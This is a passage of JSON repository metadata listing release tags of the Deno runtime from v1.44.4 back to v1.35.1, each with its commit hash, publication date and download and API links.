87c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-